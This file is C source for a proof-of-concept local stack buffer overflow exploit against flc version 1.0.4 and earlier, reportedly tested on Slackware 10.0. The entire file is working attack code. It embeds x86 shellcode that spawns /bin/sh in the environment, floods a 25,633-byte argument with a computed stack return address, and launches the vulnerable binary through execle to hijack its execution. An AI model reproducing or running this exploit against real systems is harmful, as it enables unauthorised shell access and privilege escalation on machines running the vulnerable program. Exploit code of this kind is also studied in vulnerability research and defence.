/* flc <= 1.0.4 local stack buffer overflow exploit
   (Proof of Concept)

   Tested in Slackware 10.0

   by CoKi <coki@nosystem.com.ar>
   No System Group - http://www.nosystem.com.ar
*/

#include <stdio.h>
#include <strings.h>

#define BUFFER 25632 + 1

char shellcode[]=
	"\x31\xc0"                         /* xor %eax,%eax    */
	"\x31\xd2"                         /* xor %edx,%edx    */
	"\x52"                             /* push %edx        */
	"\x68\x2f\x2f\x73\x68"             /* push $0x68732f2f */
	"\x68\x2f\x62\x69\x6e"             /* push $0x6e69622f */
	"\x89\xe3"                         /* movl %esp,%ebx   */
	"\x52"                             /* push %edx        */
	"\x53"                             /* push %ebx        */
	"\x89\xe1"                         /* movl %esp,%ecx   */
	"\xb0\x0b"                         /* mov $0xb,%al     */
	"\xcd\x80";                        /* int $0x80        */

int main(int argc, char *argv[]) {

	char *env[3] = {shellcode, NULL};
	char buf[BUFFER], *path;
	int *buffer = (int *) (buf);
	int i, ret;

	if(argc != 2) {
		printf(" use: %s <path>\n", argv[0]);
		exit(0);
	}

	path = argv[1];

	ret = 0xbffffffa - strlen(shellcode) - strlen(path);

	for(i=0; i<=BUFFER; i+=4)
	*buffer++ = ret;

	printf("\n flc <= 1.0.4 local stack buffer overflow (Proof of Concept)\n");
	printf(" by CoKi <coki@nosystem.com.ar>\n\n");

	execle(path, "flc", buf, NULL, env);
}